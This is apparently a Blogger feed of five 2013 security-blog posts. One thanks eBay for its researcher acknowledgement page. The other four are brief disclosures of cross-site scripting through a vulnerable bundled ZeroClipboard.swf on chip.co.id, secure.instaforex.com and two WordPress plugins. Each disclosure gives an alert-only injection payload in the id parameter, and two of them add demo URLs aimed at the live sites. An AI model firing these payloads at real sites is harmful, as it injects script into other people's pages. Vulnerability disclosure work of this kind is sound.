// API callback
related_results_labels({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-312255606046542141"},"updated":{"$t":"2020-12-01T01:17:10.661-08:00"},"category":[{"term":"sekuriti"},{"term":"exploit"},{"term":"iNFO"},{"term":"berita"},{"term":"xss"},{"term":"cerita"},{"term":"mozilla"},{"term":"wordpress"},{"term":"plugin"},{"term":"CSRF"},{"term":"cintaku"},{"term":"malware"},{"term":"Content Spoofing"},{"term":"Perjuangan Belum Selesai"},{"term":"Tun Dr. Mahathir"},{"term":"hootsuite"},{"term":"malaysia"},{"term":"melayuku"},{"term":"#HootSuite"},{"term":"#HootSuite University"},{"term":"1337day"},{"term":"HSUchat"},{"term":"HootAmb"},{"term":"Responsible Disclosure Acknowledgement"},{"term":"Secure Messenger"},{"term":"Text Injection"},{"term":"atm"},{"term":"firefox"},{"term":"google"},{"term":"ketuanan rakyat"},{"term":"personal"},{"term":"rakyat"},{"term":"upload"},{"term":"#‎HootAmb‬"},{"term":"Antivirus"},{"term":"Denial of Service Vulnerability"},{"term":"FirefoxOS2015"},{"term":"Heml.is"},{"term":"PC Defender Plus"},{"term":"Shellshock"},{"term":"Social media consultant"},{"term":"bash"},{"term":"bash\/Shellshock"},{"term":"bitcoin"},{"term":"browser"},{"term":"bunga raya"},{"term":"clickjacking"},{"term":"communitiy"},{"term":"dlink"},{"term":"donate"},{"term":"dos"},{"term":"e107"},{"term":"ebay"},{"term":"events"},{"term":"facebook"},{"term":"ffos"},{"term":"fvck"},{"term":"hati"},{"term":"kerja"},{"term":"media"},{"term":"merdeka"},{"term":"mobile"},{"term":"mozmy"},{"term":"reps"},{"term":"router"},{"term":"rss reader"},{"term":"ruby"},{"term":"social"},{"term":"spam"},{"term":"university"},{"term":"vulnerability"},{"term":"yahoo"}],"title":{"type":"text","$t":"Justryuz's"},"subtitle":{"type":"html","$t":"IT, Travel \u0026amp; Life"},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/posts\/default"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/-\/sekuriti?alt=json-in-script\u0026max-results=5"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/search\/label\/sekuriti"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"},{"rel":"next","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/-\/sekuriti\/-\/sekuriti?alt=json-in-script\u0026start-index=6\u0026max-results=5"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"76"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"5"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-7623982495599292861"},"published":{"$t":"2013-09-03T21:21:00.002-07:00"},"updated":{"$t":"2013-09-03T21:21:49.253-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"ebay"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Responsible Disclosure Acknowledgement"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"}],"title":{"type":"text","$t":"Thanks Ebay for Security Researchers page"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\u003Cblockquote class=\"tr_bq\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003EWe thank everyone for their contributions, but from time to time, we  will want to publically acknowledge and thank members of our community  on our Responsible Disclosure Acknowledgement Page (and elsewhere) for  reporting a problem on our \u003Ca href=\"http:\/\/pages.ebay.com\/securitycenter\/Researchers.html\"\u003ESecurity Researchers\u003C\/a\u003E page. \u003C\/span\u003E\u003C\/blockquote\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Ca href=\"http:\/\/2.bp.blogspot.com\/--kNuWqGPcJ4\/Uia0r2a1WBI\/AAAAAAAAAv8\/TuxGSBTISG8\/s1600\/bay.bmp\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" height=\"215\" src=\"http:\/\/2.bp.blogspot.com\/--kNuWqGPcJ4\/Uia0r2a1WBI\/AAAAAAAAAv8\/TuxGSBTISG8\/s400\/bay.bmp\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/span\u003E\u003C\/div\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Ca href=\"http:\/\/pages.ebay.com\/securitycenter\/ResearchersAcknowledgement.html\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003EResearchers Acknowledgement\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E.\/ryuzaki @Justryuz \u003C\/span\u003E\u003Cbr \/\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003C\/div\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/7623982495599292861\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/09\/thanks-ebay-for-security-researchers.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/7623982495599292861"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/7623982495599292861"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/09\/thanks-ebay-for-security-researchers.html","title":"Thanks Ebay for Security Researchers page"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"http:\/\/2.bp.blogspot.com\/--kNuWqGPcJ4\/Uia0r2a1WBI\/AAAAAAAAAv8\/TuxGSBTISG8\/s72-c\/bay.bmp","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-3478789661938186940"},"published":{"$t":"2013-08-06T16:32:00.001-07:00"},"updated":{"$t":"2013-08-19T16:13:09.730-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"exploit"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"chip.co.id \u003C== XSS"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E##################################################\u003Cbr \/\u003E# Description : chip.co.id \u0026lt;== XSS\u003Cbr \/\u003E# Version : -\u003Cbr \/\u003E# Date : 7\/8\/2013\u003Cbr \/\u003E# Author : Ryuzaki Lawlet \/ Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)\u003Cbr \/\u003E##################################################\u003Cbr \/\u003E\u003Cbr \/\u003EAbout:\u003Cbr \/\u003EMedia IT Indonesia yang selalu konsisten menyajikan infomasi tentang : Teknologi, \u003Cbr \/\u003ESosial Media Digital, Anti Virus, Game, Software, Hardware Review dan Hardware terkini\u003Cbr \/\u003E\u003Cbr \/\u003EVulnerabilities in the \u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003Echip.co.id\u003C\/span\u003E website,\u003Cbr \/\u003Ewhich can be exploited by malicious people to conduct cross-site scripting attacks.\u003Cbr \/\u003EThe vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.\u003Cbr \/\u003ECross-Site Scripting vulnerabilities in ZeroClipboard(http:\/\/seclists.org\/fulldisclosure\/2013\/Feb\/103) \u003Cbr \/\u003Eand in multiple web applications.\u003Cbr \/\u003E\u003Cbr \/\u003EAffected vendors \/ author:\u003Cbr \/\u003Ehttp:\/\/chip.co.id\u003Cbr \/\u003E\u003Cbr \/\u003EDetails:\u003Cbr \/\u003ECross-Site Scripting (WASC-08):\u003Cbr \/\u003EXSS via id parameter and XSS via copying payload into clipboard\u003Cbr \/\u003E\u003Cbr \/\u003EPOC:\u003Cbr \/\u003Ehttp:\/\/site\/public\/document\/copyclipboard\/zeroclipboard\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EDemo:\u003Cbr \/\u003Ehttp:\/\/chip.co.id\/public\/document\/copyclipboard\/zeroclipboard\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EProvided and\/or discovered by:\u003Cbr \/\u003ERyuzaki Lawlet \/ Fahmi Fisal @justryuz\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/3478789661938186940\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/chipcoid-xss.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/3478789661938186940"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/3478789661938186940"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/chipcoid-xss.html","title":"chip.co.id \u003C== XSS"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-4152732598264034547"},"published":{"$t":"2013-08-06T16:31:00.002-07:00"},"updated":{"$t":"2013-08-06T16:31:17.246-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"exploit"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"secure.instaforex.com \u003C== XSS"},"content":{"type":"html","$t":"\u003Cbr \/\u003E##################################################\u003Cbr \/\u003E# Description : secure.instaforex.com \u0026lt;== XSS\u003Cbr \/\u003E# Version : -\u003Cbr \/\u003E# Date : 7\/8\/2013\u003Cbr \/\u003E# Author : Ryuzaki Lawlet \/ Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)\u003Cbr \/\u003E##################################################\u003Cbr \/\u003E\u003Cbr \/\u003EVulnerabilities in the secure.instaforex.com website,\u003Cbr \/\u003Ewhich can be exploited by malicious people to conduct cross-site scripting attacks.\u003Cbr \/\u003EThe vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.\u003Cbr \/\u003ECross-Site Scripting vulnerabilities in ZeroClipboard(http:\/\/seclists.org\/fulldisclosure\/2013\/Feb\/103) \u003Cbr \/\u003Eand in multiple web applications.\u003Cbr \/\u003E\u003Cbr \/\u003EAffected vendors \/ author:\u003Cbr \/\u003Ehttps:\/\/secure.instaforex.com\u003Cbr \/\u003E\u003Cbr \/\u003EDetails:\u003Cbr \/\u003ECross-Site Scripting (WASC-08):\u003Cbr \/\u003EXSS via id parameter and XSS via copying payload into clipboard\u003Cbr \/\u003E\u003Cbr \/\u003EPOC:\u003Cbr \/\u003Ehttps:\/\/site\/id\/js\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EDemo:\u003Cbr \/\u003Ehttps:\/\/secure.instaforex.com\/id\/js\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EProvided and\/or discovered by:\u003Cbr \/\u003ERyuzaki Lawlet \/ Fahmi Fisal @justryuz\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/4152732598264034547\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/secureinstaforexcom-xss.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/4152732598264034547"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/4152732598264034547"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/secureinstaforexcom-xss.html","title":"secure.instaforex.com \u003C== XSS"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-5792630897449059480"},"published":{"$t":"2013-08-06T16:30:00.004-07:00"},"updated":{"$t":"2013-08-06T16:30:43.944-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"exploit"},{"scheme":"http://www.blogger.com/atom/ns#","term":"plugin"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"wordpress"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"Wordpress Plugins - 1 Flash Gallery \u003C== XSS"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E##################################################\u003Cbr \/\u003E# Description : Wordpress Plugins - 1 Flash Gallery \u0026lt;== XSS\u003Cbr \/\u003E# Version : -\u003Cbr \/\u003E# Date : 7\/8\/2013\u003Cbr \/\u003E# Author : Ryuzaki Lawlet \/ Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)\u003Cbr \/\u003E##################################################\u003Cbr \/\u003E\u003Cbr \/\u003EAbout:\u003Cbr \/\u003E1 Flash Gallery photo gallery plugin with slideshow function. It provides a comprehensive interface for managing \u003Cbr \/\u003Ephotos and images through a set of admin pages, and it displays image gallery in a way that makes your web site look \u003Cbr \/\u003Every nice. You can display galleries with a beautiful image gallery skins integrated with \"1 Flash Gallery\".\u003Cbr \/\u003E\u003Cbr \/\u003EVulnerabilities in the 1 Flash Gallery plugin for WordPress,\u003Cbr \/\u003Ewhich can be exploited by malicious people to conduct cross-site scripting attacks.\u003Cbr \/\u003EThe vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.\u003Cbr \/\u003ECross-Site Scripting vulnerabilities in ZeroClipboard(http:\/\/seclists.org\/fulldisclosure\/2013\/Feb\/103) \u003Cbr \/\u003Eand in multiple web applications.\u003Cbr \/\u003E\u003Cbr \/\u003EAffected products:\u003Cbr \/\u003EVulnerable are all versions\u003Cbr \/\u003E\u003Cbr \/\u003EAffected vendors:\u003Cbr \/\u003E1 Flash Gallery\u003Cbr \/\u003Ehttp:\/\/1plugin.com\/ \/http:\/\/wordpress.org\/plugins\/1-flash-gallery\/\u003Cbr \/\u003E\u003Cbr \/\u003EDetails:\u003Cbr \/\u003ECross-Site Scripting (WASC-08):\u003Cbr \/\u003EXSS via id parameter and XSS via copying payload into clipboard\u003Cbr \/\u003E\u003Cbr \/\u003EPOC:\u003Cbr \/\u003Ehttp:\/\/site\/wp-content\/plugins\/1-flash-gallery\/swf\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EProvided and\/or discovered by:\u003Cbr \/\u003ERyuzaki Lawlet \/ Fahmi Fisal @justryuz\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/5792630897449059480\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/wordpress-plugins-1-flash-gallery-xss.html#comment-form","title":"1 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/5792630897449059480"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/5792630897449059480"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/wordpress-plugins-1-flash-gallery-xss.html","title":"Wordpress Plugins - 1 Flash Gallery \u003C== XSS"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"1"}},{"id":{"$t":"tag:blogger.com,1999:blog-312255606046542141.post-5316691967528667426"},"published":{"$t":"2013-08-06T16:30:00.000-07:00"},"updated":{"$t":"2013-08-06T16:30:00.585-07:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"exploit"},{"scheme":"http://www.blogger.com/atom/ns#","term":"plugin"},{"scheme":"http://www.blogger.com/atom/ns#","term":"sekuriti"},{"scheme":"http://www.blogger.com/atom/ns#","term":"wordpress"},{"scheme":"http://www.blogger.com/atom/ns#","term":"xss"}],"title":{"type":"text","$t":"Wordpress Plugins - Cleeng Content Monetization(Cleeng) \u003C== XSS"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;Courier New\u0026quot;,Courier,monospace;\"\u003E##################################################\u003Cbr \/\u003E# Description : Wordpress Plugins - Cleeng Content Monetization(Cleeng) \u0026lt;== XSS\u003Cbr \/\u003E# Version : 2.3.2\u003Cbr \/\u003E# Date : 7\/8\/2013\u003Cbr \/\u003E# Author : Ryuzaki Lawlet \/ Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)\u003Cbr \/\u003E##################################################\u003Cbr \/\u003E\u003Cbr \/\u003EAbout:\u003Cbr \/\u003ECleeng is a unique monetization solution that satisfies both publishers and users interests:\u003Cbr \/\u003E1- If you are musician, blogger, teachers, photographers or software developer, this free plug-in is made for you!\u003Cbr \/\u003E\u003Cbr \/\u003EVulnerabilities in the Cleeng Content Monetization(Cleeng) plugin for WordPress,\u003Cbr \/\u003Ewhich can be exploited by malicious people to conduct cross-site scripting attacks.\u003Cbr \/\u003EThe vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.\u003Cbr \/\u003ECross-Site Scripting vulnerabilities in ZeroClipboard(http:\/\/seclists.org\/fulldisclosure\/2013\/Feb\/103) \u003Cbr \/\u003Eand in multiple web applications.\u003Cbr \/\u003E\u003Cbr \/\u003EAffected products:\u003Cbr \/\u003EVulnerable are all versions\u003Cbr \/\u003E\u003Cbr \/\u003EAffected vendors:\u003Cbr \/\u003ECleeng Content Monetization\u003Cbr \/\u003Ehttp:\/\/cleeng.com \/ http:\/\/wordpress.org\/plugins\/cleeng\/ \u003Cbr \/\u003E\u003Cbr \/\u003EDetails:\u003Cbr \/\u003ECross-Site Scripting (WASC-08):\u003Cbr \/\u003EXSS via id parameter and XSS via copying payload into clipboard\u003Cbr \/\u003E\u003Cbr \/\u003EPOC:\u003Cbr \/\u003Ehttp:\/\/site\/wp-content\/plugins\/cleeng\/js\/ZeroClipboard.swf?id=\\\"))}catch(e){}if(!self.a)self.a=!alert(\/XSS\/)\/\/\u0026amp;width\u0026amp;height\u003Cbr \/\u003E\u003Cbr \/\u003EProvided and\/or discovered by:\u003Cbr \/\u003ERyuzaki Lawlet \/ Fahmi Fisal @justryuz\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"http:\/\/justryuz.blogspot.com\/feeds\/5316691967528667426\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/wordpress-plugins-cleeng-content.html#comment-form","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/5316691967528667426"},{"rel":"self","type":"application/atom+xml","href":"http:\/\/www.blogger.com\/feeds\/312255606046542141\/posts\/default\/5316691967528667426"},{"rel":"alternate","type":"text/html","href":"http:\/\/justryuz.blogspot.com\/2013\/08\/wordpress-plugins-cleeng-content.html","title":"Wordpress Plugins - Cleeng Content Monetization(Cleeng) \u003C== XSS"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}}]}});